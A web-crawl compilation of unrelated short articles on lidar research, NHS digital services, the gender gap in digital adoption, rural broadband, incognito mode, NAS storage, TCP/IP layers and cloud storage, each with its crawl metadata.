Used OT Attack to Disrupt Power in Ukraine Amid Mass Missile Strikes” – Ryan Naraine, Security Week https://www.securityweek.com/russian-hackers-ot-attack-disrupted-power-in-ukraine-amid-mass-missile-strikes/ - “Google Cloud’s Cybersecurity Trends to Watch in 2024 Include Generative AI-Based Attacks” – Megan Crouse, TechRepublic https://www.techrepublic.com/article/state-of-cybersecurity-2024/ - “The Hamas-Israeli war is also being fought in cyberspace” – David Strom, Silicon Angle https://siliconangle.com/2023/10/12/hamas-israeli-war-also-fought-cyberspace/ - “How hackers piled onto the Israeli-Hamas conflict” – Antoaneta Roussi & Maggie Miller, Politico https://www.politico.eu/article/israel-hamas-war-hackers-cyberattacks/ - “NSA and U.S. Agencies Issue Best Practices for Open Source Software in Operational Technology Environments” – National Security Agency/Central Security Service, Press Release
<urn:uuid:8ffa4e7e-c491-4a50-9cd7-c9d1812cfe31>
CC-MAIN-2024-38
https://dynics.com/war-and-cybersecurity-the-advancing-cyber-battlefront/
2024-09-19T11:45:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00307.warc.gz
en
0.929817
993
2.609375
3
This COBOL program illustrates how several similar XML documents are generated from a single COBOL data item. It also illustrates how the content of several similar XML documents may be converted into COBOL data format and stored in a COBOL data item. Before any other XML statement may be executed, the XML INITIALIZE statement must be successfully executed. Since it is possible for XML INITIALIZE to fail, the return status must be checked before continuing. Data is exported from the data item Data-Table to several XML documents with the filenames of table1.xml, table2.xml, table3.xml, and table4.xml using the XML EXPORT FILE statement. All four combinations of the XML ENABLE ATTRIBUTES, XML DISABLE ATTRIBUTES, XML ENABLE ALL-OCCURRENCES, and XML DISABLE ALL-OCCURRENCES statements are used to alter the content of the generated XML documents. Next, the content of these four XML documents (plus two additional "pre-created" XML documents, table5.xml and table6.xml) is imported and placed in the same data item using the XML IMPORT FILE statement. This example does not use a schema file to validate the input because the array is fixed size and not all of the XML documents that will be input contain all of the occurrences of the array. These XML documents and their content are described in Execution results for example 4. Finally, the XML interface is terminated with the XML TERMINATE statement. If any of the statements terminate unsuccessfully, the XML GET STATUS-TEXT statement is called.
<urn:uuid:b42bfd78-78e3-46aa-9ff5-07a0e0f21005>
CC-MAIN-2024-38
https://www.microfocus.com/documentation/visual-cobol/vc70/VS2017/GUID-0C638F34-7A68-4771-AE81-244D5D97F651.html
2024-09-19T11:22:17Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652028.28/warc/CC-MAIN-20240919093719-20240919123719-00307.warc.gz
en
0.830353
343
2.984375
3
Engineers at NASA’s Goddard Space Flight Center are helping NASA improve its Lidar technology to help its scientists and explorers with remote sensing and surveying, mapping, 3D-image scanning, hazard detection and avoidance and navigation. Goddard engineers and researchers are seeking to expand the usefulness of Lidar applications in communication and navigation, planetary exploration and space operations. Lidar technology, is like sonar, but uses light instead of sound, has increasingly helped NASA scientists and explorers with remote sensing and surveying. Cutting edge innovations by Goddard researchers seek to refine Lidars into smaller, lighter, more versatile tools for exploration. Current Lidar projects One of the lidar projects being worked on by research engineer Mark Stephen is developing a deployable, segmented telescope to capture the returning light signal using state-of-the-art flat-panel optics that are organized into foldable, origami-inspired panels. “Most people want really high performance, but they want it in a small, light and power-efficient package,” Stephen said. “We’re trying to find the best balance and cost matters.” Stephen is working with researchers at Brigham Young University as well and, together, their team looks to provide future missions with the benefits of Lidar technology at a cheaper price point and greater efficiency. Lidar receivers depend on bulky lenses to capture light and these large lenses are generally where Lidar technology tends to get heavy. Flat optics utilize new types of nano-structured materials to manipulate individual photons. The meta-materials then allow thin and lightweight optics to perform the same functions as the larger, more expensive lenses. The flat optics project is a three-year effort to improve Lidar technology through a Radical Innovation Initiative grant within Goddard’s Internal Research and Development (IRAD) program and the project has been picked up by NASA’s Earth Science Technology Office to fund further improvements. Elsewhere, Goddard engineer Guangning Yang’s research seeks to improve Lidar through the production of multiple wavelengths of light from a single beam. Most current Lidars use multiple beams of a single wavelength to increase their accuracy. The Concurrent AI Spectrometry and Adaptive Lidar System (CASALS) is a Lidar technology that can sweep a large area more efficiently and starts with one laser pulse. However, instead of splitting that pulse into various directions it needs to travel, the technology changes wavelength of the laser at a very high speed. “We have improved the efficiency,” Yang said, “and that will allow us to reduce the instrument’s size dramatically.” In addition to efficiency improvements, CASALS is a smaller instrument and could help provide higher-density mapping of Earth and other planets and moons. Both the flat optics and wavelength scanning projects can offer new opportunities in science and navigation and expand the possibilities of Lidar technology. A leader in engineering services According to Everest Group, HCLTech is recognized as a leader in the Everest Group’s ACES (Autonomous, Connected, Electric and Shared) Automotive Engineering Services PEAK Matrix Assessment 2023. The IT giant has an extensive portfolio of IP around telematics platform and battery management systems, while also maintaining a portfolio that includes Lidar technology. “In the rapidly evolving automotive engineering services sector, HCLTech has emerged as a global Leader, distinguished by our multi-vertical expertise and extensive experience in traditional and digital engineering,” said Hari Sadarahalli, Corporate Vice President, Engineering and R&D Services, HCLTech. Supported by a solid ecosystem of partners, HCLTech’s offerings are further backed by investments in developing solutions, establishing labs and Centers of Excellence and a robust partnership network. Their flexibility allows the organization to adapt to project requirements, commercials, access to a wider talent pool and strong domain knowledge in the ACES space. HCLTech is in a unique position to partner with and transform enterprises business who want to leverage digital technologies to do so.
<urn:uuid:3031064d-60d3-4ee8-8f20-5738a78fdd3d>
CC-MAIN-2024-38
https://www.hcltech.com/trends-and-insights/research-engineers-make-strides-improving-lidar-technology
2024-09-20T18:30:35Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00207.warc.gz
en
0.938284
849
3.65625
4
Technology has never had more of an impact on people’s lives than today. Whether it is shopping online, chatting with friends or collaborating and working with colleagues across the world, digital services have transformed the way people act and the emergence of trends such as the Internet of Things will only continue to accelerate this. One industry in particular that has seen a huge impact from digital is healthcare, where technology promises great advances in medical treatment and research. The industry is quickly moving to an age where self-diagnosing is just around the corner. The use of wearables can also take this to the next level, bridging the interface between patient and clinician. For example, there is an increasingly number of technologies to help diabetics monitor blood glucose levels and in some cases provide automatic administration of a correct dose of insulin. >See also: The future of IT in the healthcare sector There are also wearable devices that can monitor heart rate, respiratory rate, heart rhythm, temperature, oxygen level and blood parameters, activity and sleep. As well as this, they can alert citizens when they are about to be sick and also predict their risk and suggest interventions to avoid becoming ill in the future. The ability to gather biometric data on millions of people and mine this to identify predictors of disease will be a big advance in the next decade. However, while technology is driving medical development, day-to-day healthcare services are being left behind and have yet to become digitalised. From managing the patient waiting room to organising staff rotas, the potential technology can provide is huge – yet it is being untapped. Added to this, budget cuts have been at the forefront of many people’s minds, causing cut backs and disruption, not allowing organisations to run at their most efficient. It’s time for healthcare organisations to adopt cost effective, small changes to revitalise these healthcare services bringing more flexibility and agility into the NHS. It will be these small changes that have the most impact on the healthcare industry. Small changes that make a big impact If the reader looks back over the last 100 years, the biggest advances in medicine have often been the most simple of things, for example the introduction of hand washing or the start of antiseptic surgery. This is also the case with technology as it’s the simple changes that can have the most impact, for example, booking GP appointments online instead of dealing with over-stretched receptionists. Or a staff rota that allows employees to work more flexibly and in turn be more productive when working shifts. Technology needs to empower people at a basic level, which it currently isn’t doing. As well as this, a lot of healthcare organisations rely on paper to log patient data and organise staff rotas. Not only is this a security risk, it also means that there is a lot of unnecessary admin that could be avoided. The most powerful computing capacity in most UK hospitals is usually a patient’s phone. Shocking isn’t it? But the future looks more positive. In February 2016, it was predicted that the NHS could be paper-free by 2020, following a £4.2 billion investment to bring modern techniques into the health service. This move to help staff become more tech savvy and allow people with long-term conditions to send health data to doctors and nurses over the internet is a simple change that could have a huge impact on patient care. It would also ease pressure of emergency services and allow staff to build better relationships for patients. In addition, there has been lots of talk about Wi-Fi in hospitals. Up and down the country access to free Wi-Fi has become the norm. Yet according to a ‘Freedom of Information’ request, 64% of NHS Trusts do not offer Wi-Fi to patients. Instead, third party suppliers provide limited access to the Internet at a substantial cost, sometimes up to £10 a day. It is a missed opportunity to improve the patient experience and the lack of Wi-Fi prevents doctors and nurses from using mobile devices, which would make their jobs easier and them far more efficient. On top of all this, organising staff has never been easier. By empowering staff through intelligent digital schedules and allowing them to choose their own hours and more easily switch between themselves, healthcare organisations can create a more productive and engaged workforce, reducing staff turnover and decreasing agency costs. For the NHS, this means agency spend would fall drastically, saving millions of pounds a year, as it would be more effectively using the resources it already has. It’s not the number of hours that is the problem; it’s the flexibility that’s missing. While there is no quick fix, it’s time for the NHS to start making small changes with technology adoption. Whether it’s with mobile technology, the implementation of Wi-Fi or digital staff rotas, it is these digital services that can help make the patient experience better. Technology is all about empowering staff and patients and it’s time for the NHS to step up in today’s digital age. Sourced by Chris McCullough, co-Founder and CEO at RotaGeek
<urn:uuid:d520fc72-db4b-4aca-8ef9-96040c34e76e>
CC-MAIN-2024-38
https://www.information-age.com/transforming-healthcare-tech-4209/
2024-09-09T17:46:46Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00307.warc.gz
en
0.957716
1,073
3.03125
3
The global gender gap in digital adoption excludes women from opportunities to learn, to work, and be financially independent. Many of the causes of this gap are socio-economic: women are more likely to lack the financial means and the education to use digital services. But recent research suggests another factor is at play – the abuse and harassment that so many women and girls suffer online. Fixing this is yet another reason to improve the gender diversity of the technology industry itself. According to research by GSMA, the association of mobile network operators, access to the mobile internet allows women to feel safer, more connected and more autonomous, as well as developing their education and economic independence. And it has become all the more important during the pandemic, according to Claire Sibthorpe, GSMA’s head of connected women, connected society and assistive tech. “It’s even more of a lifeline now, if you think about things like having to educate your families when schools are being closed, getting access to information about the pandemic, getting access to alternative income sources,” she says. “So it’s even more critical for women who often have these responsibilities on education, health and their families.” This makes identifying the reasons why women are less likely to use digital services all the more urgent, Sibthorpe says. What causes the digital gender gap? According to Pew Research, globally men are 3.5% more likely to own a mobile phone than women, and 5.5% more likely to own a smartphone. Pew’s analysis rises to 7% and 7.8% respectively in emerging economies, though the GMSA estimates the smartphone gender gap could be as high as 20% in low and middle-income countries. The GMSA says that, among mobile owners, women use a much smaller range of services, and are 20% less likely to use mobile internet. There are many socio-economic reasons for this gap. In the majority of middle and lower-income countries, the top two barriers to women’s adoption are affordability – particularly handset affordability – and lack of digital education and skills. “When socio-economic factors prevent access to all, women are particularly disadvantaged,” says Dina Davaki, a researcher at the London School of Economics. “Because they are over-represented in poverty, and because they’re under-represented in digital literacy.” But a recent study examining fintech adoption by the Bank for International Settlements suggests there might be more at play. The study found a gender disparity in the adoption of fintech services of around 8-9%. Even when controlling for wealth, marital and relationship status, financial confidence and literacy, or price sensitivity, there is still a significant gap between men and women. Some academics have theorised that this may be related to issues of privacy: if women have more experiences of privacy infringement both online and offline, they may be more hesitant to engage with new technologies. Research from Towson University in 2014 of millennial college students found that women were significantly more likely to report being “very concerned” about apps gathering their data. But concerns around online safety go beyond matters of data privacy. For many women, digital platforms act as an extension of real-life threats. The GMSA’s most recent report on the digital gender gap in mobile internet use found the most common barriers to adoption – handset cost and a lack of knowledge about getting online – are more important to men than women. But matters relating to safety, such as harmful online content and information security, are more important to women. In Latin America, a quarter of women see harmful content as a leading barrier to mobile internet use, and almost a third are worried about the security of their information. “So on the one hand women report that having a mobile really improves their safety,” says Sibthorpe. “But at the same time, there are concerns about being harassed. These are not concerns that are mobile or online specifically, they’re the same concerns they face in the offline world; they’re also being translated into online.” This starts early: a recent Plan International study of 14,000 girls aged 15-25 from 22 countries found that 58% had been harassed or abused online. The report found that the harassment was similar across every continent, not just in Europe and North America. And it continues well into adulthood. “So many women professionals have had to leave their jobs because of cyberbullying,” says Davaki. “It is a huge problem and it’s just another aspect of violence against women.” Improving safety for women online So what can be done? The GMSA has a few suggestions for developers app operators to address these concerns, such as providing education and training in how to use the internet safely, responding to threats, and making privacy and safety tools easy to navigate. It also encourages them to include safety measures, such as emergency contact alerts and call-blocking services, and make it easier for users to report abuse. A persistent problem, says Louise Brett, Head of FinTech at Deloitte, is that designers of new devices, apps and platforms don’t anticipate women’s concerns. “It can be designed by men for men, which is quite a big problem,” she says. “If you’re not designing for women, or potentially even designing against them, then even if you want to increase equality, you could accidentally do the opposite.” This can create a vicious cycle, Davaki says, where women don’t feel engaged by tech, so are less likely to go into tech careers and work to improve the design. And so the pattern endures. “Stereotypes can lead to technophobia or techno-enthusiasm,” says Davaki. “Techno-enthusiasm and inclusion in the digital world can be tremendously enhanced by changing the content in a way that would reflect all genders.”
<urn:uuid:4fcd85bc-0a57-4db0-92d7-324e16fd218c>
CC-MAIN-2024-38
https://www.techmonitor.ai/leadership/digital-gender-gap-wont-close-until-internet-safer-for-women
2024-09-12T06:59:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651422.16/warc/CC-MAIN-20240912043139-20240912073139-00107.warc.gz
en
0.961696
1,256
3.28125
3
Switches are fantastic devices, allowing you to create VLANs, trunks, as well as offer fast and somewhat private communication. However, the basic nature of switch operation, as well as the advent of trunk links, VLAN tags and some backwards compatibility features, created some extra security risks that were not anticipated upon the advent of the technology. In this course, Securing the Switch for Cisco CCNA 200-125/100-10, you will start off by learning about frame double-tagging. Next, you'll move onto the native VLAN security issues and DTP. You'll wrap up the course with a demonstration of creating a secure base configuration for a switch. By the end of this course, you'll know how to put a secure base configuration on a switch, mitigating many layer 2 attacks against Ethernet.
<urn:uuid:985abce0-daf6-4830-aebf-d3ae3141216f>
CC-MAIN-2024-38
https://www.mytechlogy.com/Online-IT-courses-reviews/23029/securing-the-switch-for-cisco-ccna-200-125-100-105/
2024-09-13T12:31:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00007.warc.gz
en
0.947614
167
2.59375
3
A shift has occurred in agriculture: farmers are not only relying on clouds but increasingly, on the cloud. With the click of a mouse, farmers can find out which fields need water and chemical inputs in real time. The use of this technology, called precision agriculture, is helping farming become more productive, environmentally friendly and is revolutionizing how our food is cultivated. The Food Basket of the World California’s Central Valley seems like it would be at the forefront of this shift towards precision agriculture. Called “the food basket of the world,” California produces 70% of the total fruit and tree nut farm value and 55% of the vegetable farm value for the United States, all within driving distance from Silicon Valley’s technology hub. But ironically, California’s agriculture has fallen behind. Lack of Access Many rural communities in California lack reliable, fast mobile broadband that can keep them competitive with global agriculture and safe-guard our environment. While California has a program for ground truthing reported broadband speeds, the program prioritizes households, not farms, and considers farming areas “unpopulated” in terms of need. The result is that rural economies in California are falling behind due to inadequate broadband access. The San Francisco-Bay Area ISOC Chapter is taking this problem very seriously and is working in collaboration with the Internet Society (ISOC) to alleviate it. The Chapter just received funding through ISOC’s Beyond the Net funding program to support the “Bridging California’s Rural/Urban Digital Divide with Mobile Broadband” project, which will collect data on mobile broadband performance in Yolo County—a 90 minute drive from San Francisco - and compare that performance to what mobile providers are claiming they’re delivering and to what farmers need for precision agriculture. Data and Policy Information collected will be used to report to state officials and inform public policy making on rural broadband. The Chapter will be working together with California State University (CSU) Geographical Information Center (GIC), Chico and Valley Vision in order to develop the most robust report it can. Innovation in California has always propelled the rest of the USA. We need to look no further than Silicon Valley to confirm that. Now we’re looking just outside the confines of Silicon Valley and towards our rural neighbors to help strengthen broadband capacity in Yolo County. Keep up to date with the “Bridging California’s Rural/Urban Digital Divide with Mobile Broadband” project on the Chapter’s website http://www.sfbayisoc.org/. About the SF-Bay Area Chapter – The San Francisco Bay Area ISOC Chapter has almost 2,000 members and serves California, including the Bay Area and Silicon Valley, by promoting the core values of the Internet Society.
<urn:uuid:ce719937-61ba-46ed-ab48-67f8e88fb83d>
CC-MAIN-2024-38
https://circleid.com/posts/20161229_bridging_californias_rural_digital_divide
2024-09-17T00:55:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651722.42/warc/CC-MAIN-20240917004428-20240917034428-00607.warc.gz
en
0.922779
583
3.015625
3
Phishing attacks occur when cybercriminals trick their victims into sharing personal information, such as passwords or credit card numbers, by pretending to be someone they’re not. Updated March 20, 2023. Every day, millions of people use browsers like Google Chrome, FireFox and Safari to search the internet. Out of those millions of people, a fair portion use incognito mode in an attempt to maintain their privacy and stay safe on the internet, even if this is not what incognito was created to do. While there is no harm in using incognito mode, it’s important to understand what it was created to do, which is to keep your local browsing private. Continue reading to learn what incognito mode does and doesn’t do, and how you can actually browse the internet privately. What is Incognito Mode and Is It Safe? Incognito mode, also known as private browsing, is a browsing mode that can be turned on and off within browsers. Many people use incognito mode so their search history and web browsing history aren’t saved. However, it’s important to note that even if your history isn’t saved in your browser, third parties will still be able to see it. There’s nothing unsafe about turning incognito mode on, so feel free to enable it whenever you’d like. But be cautious of its true capabilities, as they might not be what you think they are. There are many misconceptions when it comes to what incognito mode does and doesn’t do, so let’s go over two of the most common misconceptions. Incognito Mode Misconceptions Here are two misconceptions when it comes to using incognito mode. Internet Service Providers (ISPs) won’t be able to see what you search One of the biggest misconceptions about using incognito mode on your browser is that it’ll prevent anyone and everyone from seeing what you’ve searched or sites you’ve visited. This is not true. Your search and browsing history is only erased from your browser. This means your ISP, work or school will still be able to see the websites you’ve visited and things you’ve searched when connected to their network or when using their devices. Incognito mode can protect you against cyberthreats Another common misconception about incognito mode is that it acts as protection against cyberthreats. This is also not true. You’re still as vulnerable to cyberattacks when using incognito mode as you are when searching normally. The only true way to protect yourself when browsing online is by implementing cybersecurity best practices. What Incognito Mode Does Here are a few of the things that incognito mode actually does when it’s switched on. Stops browser from saving your browsing history and search queries The websites you visit are never saved in your browser’s history when incognito mode is on. However, that doesn’t mean they’re invisible to third parties. Third parties such as your work or ISP can still see the websites you’ve visited and the things you’ve searched for while incognito mode is on. But that doesn’t mean it’s completely unuseful. Incognito mode is useful for when you don’t want your browsing or search history to be viewable by other people with physical access to your computer. For example, let’s say you wanted to book a surprise trip for your mom. When booking the flight and hotel, use incognito mode to prevent your mom from finding out your secret plan. Erases cookies and site data When you close incognito mode after browsing and searching around the internet, your cookies and site data are erased. Cookies are small files of data that are created by a web server to identify your device. This data is then sent to your browser and is used to track websites you visit, as well as sites you’ve returned to. When you return to a site you visited in incognito mode, the site won’t recognize you as a returning visitor. Logs you out of accounts If you log in to one of your accounts while using incognito or fill out an online form, none of that information will be saved when you close your browser’s window. This makes incognito mode extremely helpful for when you’re borrowing someone else’s computer or using a shared computer, like in a library or at work. What Incognito Mode Does Not Do Here are a few things that incognito mode does not do when switched on. Hide your location Unless you use a VPN to hide your IP address, anyone can track down your location including websites, cybercriminals and other third parties. Incognito mode makes no difference when it comes to your location. Mask your IP address Incognito mode in no way prevents websites or cybercriminals from seeing your IP address, so even with it switched on, anyone can still see your IP address if they want to. Keep you protected from cyberattacks It’s important to remember that incognito mode is not a cybersecurity solution. With incognito mode on, you are still just as likely to be targeted by cybercriminals in an attempt to compromise your accounts or steal your sensitive information, as you are with it off. Prevent third parties from seeing what you do Third parties can still see what you’re doing on your browsers without any issue. If you log into Facebook from an incognito tab, your ISP will know what you did, and Facebook will still have access to some of your data. Even though your browsing history and cookies will be deleted once you close out of the incognito window, your data can still be traced back to you. These days, websites have access to sophisticated tools, like browser fingerprinting, that allow them to link your activity to your real identity even when you’re using incognito mode. Keep in mind that you need to be especially careful when you’re using the internet at work or school. Many schools and companies have additional tracking software that allows them to see what you’re doing, whether you’re using incognito mode or not. For this reason, you shouldn’t do anything you want to keep private on a work or school computer. How Can I Actually Browse Privately? There is no absolute guarantee that you will have complete privacy when browsing online since backdoors and vulnerabilities are being discovered every day, so there is always a risk when you surf the web. But one thing you can do when trying to browse privately is use a Virtual Private Network (VPN). A VPN encrypts your data and protects your online identity by masking your IP address. When you use a VPN, your traffic is redirected through a secure, encrypted connection on a separate server. Essentially, your ISP will see that you’ve connected to a VPN, but everything after that will be private. For example, when you visit a website, your IP address will show up as your VPN’s IP, not your own. This prevents websites from seeing who you are in most cases. The internet can be a treacherous place, and incognito mode doesn’t do much to protect your privacy. If you want to browse the internet privately, the best thing you can do is invest in a VPN.
<urn:uuid:2cf7b0ea-d115-4396-ba3f-2d0b2d810322>
CC-MAIN-2024-38
https://www.keepersecurity.com/blog/2020/12/14/incognito-mode-is-it-safe-keeper-security/
2024-09-18T08:19:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651886.88/warc/CC-MAIN-20240918064858-20240918094858-00507.warc.gz
en
0.937325
1,569
2.953125
3
Network Attached Storage What is NAS? A NAS system is a high-capacity storage device connected to a network that allows authorized network users and clients to store and retrieve data from a centralized location. Fundamentally, a NAS device is simply a container for hard drives with some additional intelligence included for files to be shared and authorized. Because a NAS device uses a technology called Redundant Array of Independent Disks (RAID), it can distribute and duplicate the stored data across multiple hard disks. That redundancy ensures data resilience in the case of any failed drives. Why do organizatons use NAS? NAS systems are versatile, flexible, and scalable, so you can add onto existing solutions as your storage needs grow. They can be either pre-populated with disks or diskless and have one or two USB ports so you can connect printers or external storage drives to the network, allowing additional options for all connected users. Do you need IT to manage NAS? Because NAS devices are simple to operate and can be configured and managed through a browser-based utility, you may not need an IT professional on standby to manage storage. Additionally, a NAS device can be accessed remotely, allowing it to serve as a private Dropbox or Google Drive with far more storage and no monthly cost. How does a NAS device work? A NAS device runs on any platform or operating system. It is essentially a bundle of hardware and software with an embedded operating system to run independently. Often, it is a simple combination of a network interface card (NIC), a storage controller, a number of drive bays, and a power supply. NAS devices contain anywhere from two to five hard drives to provide redundancy and fast file access. While NAS is often thought of as a mini-server, its controller only manages disks for storage and does not operate as a server. In basic terms, a NAS device is an appliance that directly connects to the network either through a hardwired Ethernet (RJ45) cable or via Wi-Fi, thus creating a LAN instead of WAN. It is assigned an IP address, and data transfer between users, servers, and a NAS via TCP/IP. NAS operates with a traditional file system—either a New Technology File System (NTFS) or NFS for remote file services and data sharing. All storage on the device is accessed at the file level through a file share. NAS devices deliver shared storage as network mounted volumes and use protocols like NFS and SMB/CIFS. When it’s used for shared storage, the NAS device attaches multiple servers to a common storage device. These “clusters” are often used for failover through a cluster-shared volume, which allows all cluster nodes to access the same data. A NAS consists of the following elements: - Hardware: The hardware is simply a server that contains storage disks or drives, processors, and RAM. Known as a NAS box, unit, server, or head, it transfers only two types of requests: data storage and file sharing. - Software: Storage software is preconfigured and installed on the above hardware and deployed on a lightweight operating system embedded in the hardware. - Network switch: Users access data transfer protocols through this switch, which is essentially a central server that connects to everything and routes requests. - Protocols: Transmission control protocol (TCP) combines files into packets and sends them through internet protocols (IPs). What are the benefits of using NAS? NAS systems are rapidly becoming the popular choice for businesses because they are effective, scalable, low-cost storage solutions. Using a NAS system, users can easily work together and serve customers because data is continually accessible. Selecting NAS over other solutions depends on current backup and recovery business requirements. The following are benefits to using NAS for data protection plans and business needs: As a LAN-connected device, NAS is able to store and transfer files much more quickly. It can also rapidly back up files so incremental changes are protected. Using a NAS means that companies are not using a third party for storage, which allows them to maintain total control over access to their data. Ease of use Because NAS has been around for years, administrators are more familiar with how to set up and manage them. In addition, setup is simpler because many NAS architectures have simplified scripts or streamlined operating systems already installed. Because they are on a dedicated network, users can access data from anywhere. Also, since a NAS is positioned on site, it is not subject to Internet service interruptions. What is the difference between NAS and SAN protocols? There are two main types of networked storage: NAS and storage area networks (SANs). Both NAS and SAN were developed to make stored data available to multiple users simultaneously. Each provides dedicated storage for a group of users, but they have totally different approaches. A NAS device is a relatively affordable single-storage device that serves files over Ethernet and is easy to set up. A SAN is a tightly coupled network of multiple devices that is quite a bit more complex to set up and manage. From a user perspective, the biggest difference between the two is that NAS takes care of unstructured data, including audio, video, websites, text files, and MS Office documents, while SANs handle structured data or block storage inside databases. Additionally, how they work differs quite a bit. Both manage I/O requests, but a NAS handles them for individual files while a SAN handles them for contiguous blocks of data. And each uses a different protocol for moving traffic: NAS uses Transmission Control Protocol/Internet Protocol (TCP/IP) while SAN can use FC protocol for storage networks or the Ethernet-based ISCSI protocol. Finally, they differ in how a client OS views each of them. To a client OS, NAS appears as a single device managing individual files, while a SAN is presented to the disk as the client OS itself. As a block-based data system, SAN often houses business-critical databases instead of the “economy class” NAS device. Why do small businesses use NAS? When it comes to data storage, small businesses need low-cost, scalable storage with easy operation and data backup. The following are a few examples of how organizations manage this. A leading telecom operator was looking for an easily managed backup solution that would fit their limited budget. The company was particularly concerned with the volume of internal data generated by its employees and how to find disk space for all of it. With more than 1,600 employees and at least that many desktops, laptops, and mobile devices, their 2PB storage capacity wasn’t enough. They also needed the ultimate in data protection and easy maintenance to free up staff members who were responsible for manual routine backups. They chose NAS because of its low cost, high-capacity file-sharing capabilities. A major cloud-based platform provider for the mortgage finance industry had 30 billion small files to store with a rapidly growing volume that their current storage capacity could not manage efficiently. They were struggling with repair, expansion, and maintenance issues and constantly concerned with security for their clients. They found a reliable scale-out NAS file system that offered significantly better storage efficiency and cost savings for rack-space, power, cooling, and heating. With a more scalable, flexible, and available system, they were able to devote less time and resources to storage and more time to customers. A national prison system needed a storage system that would reliably preserve high-definition video surveillance used to ensure the safety of staff and prisoners. Their current storage array lacked visibility and an automatic process for systematically deleting video, which led to capacity problems, and an upgrade to high-definition video only compounded the problem. They implemented a NAS solution with much larger capacity and room for expansion that delivers the ability to review the data and comply with preservation requirements. HPE NAS solutions HPE has NAS solutions that are secure, tailored, and economically feasible for large and small businesses alike. We offer resilient and self-protecting platforms to help you safeguard your unstructured data. Our solutions have native capabilities such as data encryption, sophisticated access controls, file access auditing, file immutability, and deletion prevention to help you reduce security risks. HPE StoreEasy is designed to help businesses get the most out of their capacity, spend less time managing storage, and densely scale capacity as they grow and protect data. With StoreEasy, you can support tens of thousands of concurrent users with diverse workloads and ensure data security while at rest and in flight with built-in encryption. And by using a StoreEasy management console, you can consolidate multiple interfaces, automate storage tasks, and centralize monitoring. With the exponential growth in unstructured data, enterprises need scale-out solutions to manage it. HPE Apollo 4000 Systems are intelligent data storage servers that provide accelerated performance, end-to-end security, and predictive analytics for storage-intensive workloads.
<urn:uuid:aa02ecee-4f57-4d93-81d4-e18e67807b88>
CC-MAIN-2024-38
https://www.hpe.com/no/en/what-is/nas.html
2024-09-19T13:51:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00407.warc.gz
en
0.949888
1,839
3.109375
3
In this figure, the related layers of the two models have the same color. As you can see, the three layers of application, presentation, and session in the OSI model are grouped into only one layer (the application layer) in the TCP/IP model. The internet layer in the TCP/IP model is equivalent to the network layer in the OSI model. Finally, the Link layer in the TCP/IP model also performs the functions of the two layers of data-link and physical in the OSI model. In TCP/IP model: - Application Layer: Consists of network applications and processes. - Transport Layer: Provides end-to-end delivery and corresponds to the OSI Transport Layer. TCP and UDP are the main protocols of this layer. - Internet Layer: Defines the IP datagram and routing. - Link Layer: Contains routines for accessing physical networks.
<urn:uuid:dfec2869-6bd3-48b9-83a9-f0cf74608cbf>
CC-MAIN-2024-38
https://www.itperfection.com/cissp/communication-network-security-domain-introducing/tcp-ip-model/
2024-09-19T13:13:34Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652031.71/warc/CC-MAIN-20240919125821-20240919155821-00407.warc.gz
en
0.867009
185
3.265625
3
When it comes to the cloud one of the biggest stumbling blocks continues to be the risk of unintended data exposure. Organizations are concerned about putting sensitive data in the cloud fearing that it might accidently end up in the wrong hands. Some companies feel more secure keeping data in house, rather than taking a risk on a cloud provider. One good way to make sure that your data is secure in the cloud is by using encryption – an algorithm that encodes data making it unreadable to those who don’t possess a decoding key. This will keep the data safe because if it did happen to fall into the wrong hands it would be unreadable without the key. To determine how your cloud vendor facilities encryption ask these questions: - Does the cloud vendor encrypt your data both at rest and in transit? - What level of encryption does the cloud vendor employ? - Who has access to the encryption key? - What encryption standards have been employed by the cloud vendor? - How are encryption keys managed, and where is the encryption key located? Do you believe that encryption is a good option for keeping data secure and this is ripe? Or do you believe this is hype and encryption isn’t a good option for keeping data secure?
<urn:uuid:331d4d9b-2145-4fcb-b60a-be700830691a>
CC-MAIN-2024-38
https://logicalisinsights.com/2013/01/09/will-encryption-increase-data-security/
2024-09-07T11:12:51Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650826.4/warc/CC-MAIN-20240907095856-20240907125856-00671.warc.gz
en
0.943489
253
2.53125
3
30 Jun The Difference Between Cloud Storage and Cloud Computing The Difference Between Cloud Storage and Cloud Computing What’s the difference between cloud computing and cloud storage? The simple answer is “cloud computing” means running processes like software over the internet, and “cloud storage” means storing data on servers to make it accessible over the internet. If you’re ready to learn more, we’re taking a deeper look to help clarify the difference between cloud computing vs cloud storage and the various uses of each. The simple way to remember the difference between cloud computing and cloud storage is: Cloud Storage = Data and Cloud Computing = Processing Cloud Computing vs Cloud Storage The “Cloud” is a catchall phrase used to describe a wide range of virtual solutions and services for individuals and businesses alike. Two such options people can choose from are cloud storage and cloud computing. Both provide benefits for businesses when implemented correctly, but they rely on each other to function and create value. Cloud computing refers to more than just software. It is essentially anything that isn’t cloud storage. You can have cloud storage without cloud computing, but you won’t be able access data stored in the cloud over the internet without some kind of online processing, a.k.a. cloud computing. Likewise, you cannot have cloud computing without cloud storage because the apps need to be stored somewhere (the cloud). To understand this relationship and the difference between cloud computing and cloud storage, let’s look at examples of each. Examples of Cloud Storage | Examples of Cloud Computing | Related Reading: Cloud Enablement: What It Is and How to Get Started Benefits of Cloud Storage Cloud storage is simply storing data & files and performing backups to an external location offsite. The main benefit of this solution is it ensures a company’s data is kept secure and readily available in case onsite data is lost, or there is some form of unexpected disaster, like a fire which destroys the business. Plus, data is stored on a virtual server, not the employees’ actual devices. Key benefits include: - Improved Access - Improved Collaboration - Improved Security - Improved Backup and Disaster Recovery - Improved Agility Benefits 